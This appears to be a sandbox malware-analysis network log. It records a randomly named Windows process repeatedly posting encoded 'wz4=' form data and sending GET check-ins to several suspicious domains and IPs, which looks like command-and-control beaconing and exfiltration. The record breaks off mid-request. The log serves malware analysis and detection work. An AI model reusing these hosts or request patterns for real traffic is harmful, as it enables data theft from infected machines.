| 1 | 192.168.2.4 | 57319 | 206.119.82.172 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe |
Timestamp: Jan 14, 2025 10:24:52.923654079 CET | Bytes transferred: 694 | Direction: OUT
POST /p75v/ HTTP/1.1
                                                                              Host: www.wddb97.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.wddb97.top
                                                                              Referer: http://www.wddb97.top/p75v/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 200
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Ascii: wz4=LJOPmiKfTeIBMutBzvzFrhIyqQwbROtjkzTRv+PD4ICLW1n5KLxH7h4f1VdQRbb+xe2StXd8dhaAwFoV/2zmTFRoH8aXkke7M347iq5crr+T1XyDmSmyds5XfApymKKpbq00ywkIsmJHEnpwYqauvGsLPR1tYqs7fNumAa5tP9y/xLn9sxa7bpr2gP8n+GSlFg==
Timestamp: Jan 14, 2025 10:24:53.838659048 CET | Bytes transferred: 302 | Direction: IN
HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Tue, 14 Jan 2025 09:24:53 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 138
                                                                              Connection: close
                                                                              ETag: "66aa3a46-8a"
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.4 | 57320 | 206.119.82.172 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe |
Timestamp: Jan 14, 2025 10:24:55.466136932 CET | Bytes transferred: 714 | Direction: OUT
POST /p75v/ HTTP/1.1
                                                                              Host: www.wddb97.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.wddb97.top
                                                                              Referer: http://www.wddb97.top/p75v/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Data Ascii: wz4=LJOPmiKfTeIBef9B/tbFsBIxlwwbfutvkzfRv73T77mLWV35b6xH+h4f+1dfVbbpxeyatWh8dhmAwF4V/FbhSVRuSMbxgke7M347iqt2rrmT1mCD8zm9es5UIwpy3aKtbq0KyyAiskBHEiVwdo+vlGtARh05JoJMZ52vHbpWFd+Y0Nqn9A7sJpPF9I1TzFvsesLc5cYdjsTMcL64phmbkWA=
Jan 14, 2025 10:24:56.386970043 CET | 302 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 14 Jan 2025 09:24:56 GMT
Content-Type: text/html
Content-Length: 138
Connection: close
ETag: "66aa3a46-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 57327 | 206.119.82.172 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:24:58.014214039 CET | 10796 | OUT | POST /p75v/ HTTP/1.1
Host: www.wddb97.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.wddb97.top
Referer: http://www.wddb97.top/p75v/
Cache-Control: no-cache
Connection: close
Content-Length: 10300
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Data Ascii: wz4= [TRUNCATED]
Jan 14, 2025 10:24:58.923877954 CET | 302 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 14 Jan 2025 09:24:58 GMT
Content-Type: text/html
Content-Length: 138
Connection: close
ETag: "66aa3a46-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 57343 | 206.119.82.172 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:25:00.558845043 CET | 437 | OUT | GET /p75v/?OvV=2njD6f80EDOLQ8&wz4=GLmvlUrKOeNEevY3wcyfjSkNrwRDbMR2/x32zMvR34mmT0X9ObY05SVA9W4yUMrr2Yq11ERvKU6w2wYb4X7EbFt4LfTn3Wu5NGMirqATx7GUx0yxlSOAJso= HTTP/1.1
Host: www.wddb97.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Jan 14, 2025 10:25:01.443435907 CET | 302 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 14 Jan 2025 09:25:01 GMT
Content-Type: text/html
Content-Length: 138
Connection: close
ETag: "66aa3a46-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 57374 | 67.223.117.142 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:25:06.500929117 CET | 706 | OUT | POST /ro4w/ HTTP/1.1
Host: www.nexula.website
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.nexula.website
Referer: http://www.nexula.website/ro4w/
Cache-Control: no-cache
Connection: close
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Data Ascii: wz4=R5zM4rYMGf6QffGG1HCjS/Ubr0FDl9e0Y87zKpNhEFqUpYD8qHHLMl62D9E3DlgqduWz9HNUhvfi8ypV32Rwd8yjQZ9bJLgbCsPHCCt7t11yqUlaUnfbUd3ZMEs4gVh1iFQ0jJi8MxQl5/KDmEPNBnbmq5RO7+LOIn3CtnzTE8nZhw/NeLswmfqs5fLTNxfjLg==
Jan 14, 2025 10:25:07.096520901 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Tue, 14 Jan 2025 09:25:07 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 57395 | 67.223.117.142 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:25:09.049071074 CET | 726 | OUT | POST /ro4w/ HTTP/1.1
Host: www.nexula.website
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.nexula.website
Referer: http://www.nexula.website/ro4w/
Cache-Control: no-cache
Connection: close
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Data Ascii: wz4=R5zM4rYMGf6Qc+2G5A2jVfUYyUFDudeoY8nzKoJxEzyUp6r8rFvLBF62LdEuOFghdubG9C1Uhr3i8yZV3AZzcsyhc59dNLgbCsPHCC5Ft1tyrkVaOGfcd93Yc0s4qFgyiFQGjI+aM3cl562DmVPKb3bgnZQs8MCQMGC/kXrHMs+1tWyXP6Nn0fOfkYCnAyiqQimNDGZFDlH5BCYOX96TVKo=
Jan 14, 2025 10:25:09.624825954 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Tue, 14 Jan 2025 09:25:09 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 57411 | 67.223.117.142 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:25:11.594302893 CET | 10808 | OUT | POST /ro4w/ HTTP/1.1
Host: www.nexula.website
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.nexula.website
Referer: http://www.nexula.website/ro4w/
Cache-Control: no-cache
Connection: close
Content-Length: 10300
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Data Ascii: wz4= [TRUNCATED]
Jan 14, 2025 10:25:12.197561979 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Tue, 14 Jan 2025 09:25:12 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 57427 | 67.223.117.142 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:25:14.141410112 CET | 441 | OUT | GET /ro4w/?wz4=c7bs7cBJE/6WeNDz6y7wfs4csA5ai8mWfunIFb5NDUjHoY3en1z9O1W0OakyKWwaCum+/W1z6qbtx3tl+iJ0V9nyUJg4fcAQQsDkMDUAlXZwvkRINEDVO9c=&OvV=2njD6f80EDOLQ8 HTTP/1.1
Host: www.nexula.website
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Jan 14, 2025 10:25:14.747024059 CET | 548 | IN | HTTP/1.1 404 Not Found
Date: Tue, 14 Jan 2025 09:25:14 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 57463 | 162.0.215.244 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 10:25:19.805500031 CET | 718 | OUT | POST /rpjd/ HTTP/1.1
Host: www.prediksipreman.fyi
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.prediksipreman.fyi
Referer: http://www.prediksipreman.fyi/rpjd/
Cache-Control: no-cache
Connection: close
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Ascii: wz4=/MhJYgC20Hdq/l4LPl4rbzgfTKZf8croG3/aJaFYr0yDIku2W6zTfFvgU6gox3o1LXFxmtwjXGFUzi7YCqnHNX4RUO0OCkk9X280y0xvKanSaTKkzxMYPzTWCcqqywfeXqodLwwQzL9TQe/tnz8vjLCLX7Yy5j5vLN/WRq4K2zpzlPv5iiCwzdIS3P4rkrnydA==
                                                                              Jan 14, 2025 10:25:20.684838057 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              keep-alive: timeout=5, max=100
                                                                              content-type: text/html
                                                                              transfer-encoding: chunked
                                                                              content-encoding: gzip
                                                                              vary: Accept-Encoding
                                                                              date: Tue, 14 Jan 2025 09:25:20 GMT
                                                                              server: LiteSpeed
                                                                              x-turbo-charged-by: LiteSpeed
                                                                              connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              10 | 192.168.2.4 | 57479 | 162.0.215.244 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 10:25:22.349761009 CET | 738 | OUT | POST /rpjd/ HTTP/1.1
                                                                              Host: www.prediksipreman.fyi
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.prediksipreman.fyi
                                                                              Referer: http://www.prediksipreman.fyi/rpjd/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Ascii: wz4=/MhJYgC20Hdqt3sLIysrTzgeN6ZflMrsG3zaJbBurGmDIEe2X7zTaFvgcagp/Xo+LXIEmvkjXG5UzjLYFbnEMH4fN+0MNEk9X280y3NFKcPSai6kyT0bMzTXFcqq2wfCXqp6Lx86zJ1TQc3tgi8stLCJJLYjxWQcKc7YZKos0iZBtpijzTjnhdshqIxfpoa7GJv1vvyMd8AM5jD6678i4Us=
                                                                              Jan 14, 2025 10:25:23.176243067 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              keep-alive: timeout=5, max=100
                                                                              content-type: text/html
                                                                              transfer-encoding: chunked
                                                                              content-encoding: gzip
                                                                              vary: Accept-Encoding
                                                                              date: Tue, 14 Jan 2025 09:25:22 GMT
                                                                              server: LiteSpeed
                                                                              x-turbo-charged-by: LiteSpeed
                                                                              connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              11 | 192.168.2.4 | 57496 | 162.0.215.244 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 10:25:24.897861958 CET | 10820 | OUT | POST /rpjd/ HTTP/1.1
                                                                              Host: www.prediksipreman.fyi
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.prediksipreman.fyi
                                                                              Referer: http://www.prediksipreman.fyi/rpjd/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 10300
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Ascii: wz4= [TRUNCATED]
                                                                              Jan 14, 2025 10:25:25.619617939 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              keep-alive: timeout=5, max=100
                                                                              content-type: text/html
                                                                              transfer-encoding: chunked
                                                                              content-encoding: gzip
                                                                              vary: Accept-Encoding
                                                                              date: Tue, 14 Jan 2025 09:25:25 GMT
                                                                              server: LiteSpeed
                                                                              x-turbo-charged-by: LiteSpeed
                                                                              connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              12 | 192.168.2.4 | 57512 | 162.0.215.244 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 10:25:27.452646017 CET | 445 | OUT | GET /rpjd/?wz4=yOJpbVbkgz0HtUwQYARMSThcLcopmrPoDVX6GqNwoWWXZF3pcIj1Y13LV6gW4nMVJ2J858d+IDhJ+laaNqfHK1c6MutgW040XFAhxno1AdPNbACR1ywEbhk=&OvV=2njD6f80EDOLQ8 HTTP/1.1
                                                                              Host: www.prediksipreman.fyi
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Jan 14, 2025 10:25:28.131764889 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              keep-alive: timeout=5, max=100
                                                                              content-type: text/html
                                                                              transfer-encoding: chunked
                                                                              date: Tue, 14 Jan 2025 09:25:27 GMT
                                                                              server: LiteSpeed
                                                                              x-turbo-charged-by: LiteSpeed
                                                                              connection: close
                                                                              Data Ascii: 2785<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                              Jan 14, 2025 10:25:28.131808996 CET | 1236 | IN | Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                              Jan 14, 2025 10:25:28.131839991 CET | 448 | IN | Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                              Jan 14, 2025 10:25:28.131874084 CET | 1236 | IN | Data Ascii: border: 0; } .copyright { font-size: 10px; color: #3F4143; } @media (min-width: 768px) { .additional-info { position: relative; overf
                                                                              Jan 14, 2025 10:25:28.131905079 CET | 1236 | IN | Data Ascii: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPAAAADqCAMAAACrxjhdAAAAt1BMVEUAAAAAAAD/////////////////////
                                                                              Jan 14, 2025 10:25:28.132035017 CET | 1236 | IN | Data Ascii: WebMaster</a>. </section> <p class="reason-text">The server cannot find the requested page:</p> </div> <section class="additional-info"> <div class="
                                                                              Jan 14, 2025 10:25:28.132069111 CET | 11 | IN | Data Ascii: ml>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              13 | 192.168.2.4 | 57544 | 3.33.130.190 | 80 | 4944 | C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 10:25:33.304498911 CET | 715 | OUT | POST /qjug/ HTTP/1.1
                                                                              Host: www.scottconsults.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.scottconsults.top
                                                                              Referer: http://www.scottconsults.top/qjug/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 200
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Ascii: wz4=YekEfZtrIaXYr9YX79DKgpv3U19zYUY6kHRhfA9vOt9S5QIp/6NFS+lltg8oAu+zCz/HQ/b3iLZX4iGusfNjLbfrJuctInvgPhe2dWUnNMiKfQ1WlPVoiJ1fyTBeenc07qULjAyZiiRHNYIHx2pU1zLJ7c+l5WF747C+UaY9WLx3ouOfmjSdIcr+OBHid/Mrkw==
Timestamp: Jan 14, 2025 10:25:33.751871109 CET | Bytes transferred: 73 | Direction: IN
HTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 57557 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 4944 | Process: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp: Jan 14, 2025 10:25:35.843641043 CET | Bytes transferred: 735 | Direction: OUT
POST /qjug/ HTTP/1.1
                                                                              Host: www.scottconsults.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.scottconsults.top
                                                                              Referer: http://www.scottconsults.top/qjug/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Ascii: wz4=YekEfZtrIaXYtcIX5frK3ZvwR19zDEZzkHNhfBoyOeJS5x4p87NFT+ll1w8tEu+0CzzlQ673iLNX4n6usM1iJLfpGOcvVXvgPhe2dXwBNM6KehlWmrBnvp1cxTBeanco7qUTjBuzigpHNdMHwkBXsDLL/c/6pFk1iLrOaoIHQJFrkIDF3SzKacPNTGOWQ8xi/4LQljnjx+T1SlFHx9dg774=
Timestamp: Jan 14, 2025 10:25:36.292016029 CET | Bytes transferred: 73 | Direction: IN
HTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 57570 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 4944 | Process: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp: Jan 14, 2025 10:25:38.397027016 CET | Bytes transferred: 10817 | Direction: OUT
POST /qjug/ HTTP/1.1
                                                                              Host: www.scottconsults.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.scottconsults.top
                                                                              Referer: http://www.scottconsults.top/qjug/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 10300
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Data Ascii: wz4= [TRUNCATED]
Timestamp: Jan 14, 2025 10:25:38.842823982 CET | Bytes transferred: 73 | Direction: IN
HTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 57583 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 4944 | Process: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp: Jan 14, 2025 10:25:40.938628912 CET | Bytes transferred: 444 | Direction: OUT
GET /qjug/?wz4=VcMkcuIRceq81+g9yOCv0sbld0olDHkRvlNhYh95NOpnwjcC/r1DFPFDhAQ/BZSpNAD5Fbv04pxr6m2h9PMUHq+9H+1HT0zuQhfUSGVBQeWRfQVA8fdlyIU=&OvV=2njD6f80EDOLQ8 HTTP/1.1
                                                                              Host: www.scottconsults.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Timestamp: Jan 14, 2025 10:25:41.405595064 CET | Bytes transferred: 379 | Direction: IN
HTTP/1.1 200 OK
                                                                              content-type: text/html
                                                                              date: Tue, 14 Jan 2025 09:25:41 GMT
                                                                              content-length: 258
                                                                              connection: close
                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wz4=VcMkcuIRceq81+g9yOCv0sbld0olDHkRvlNhYh95NOpnwjcC/r1DFPFDhAQ/BZSpNAD5Fbv04pxr6m2h9PMUHq+9H+1HT0zuQhfUSGVBQeWRfQVA8fdlyIU=&OvV=2njD6f80EDOLQ8"}</script></head></html>


Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 57600 | Destination IP: 38.47.233.52 | Destination Port: 80 | PID: 4944 | Process: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp: Jan 14, 2025 10:25:54.877959967 CET | Bytes transferred: 691 | Direction: OUT
POST /dim8/ HTTP/1.1
                                                                              Host: www.2q33e.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.2q33e.top
                                                                              Referer: http://www.2q33e.top/dim8/
                                                                              Cache-Control: no-cache
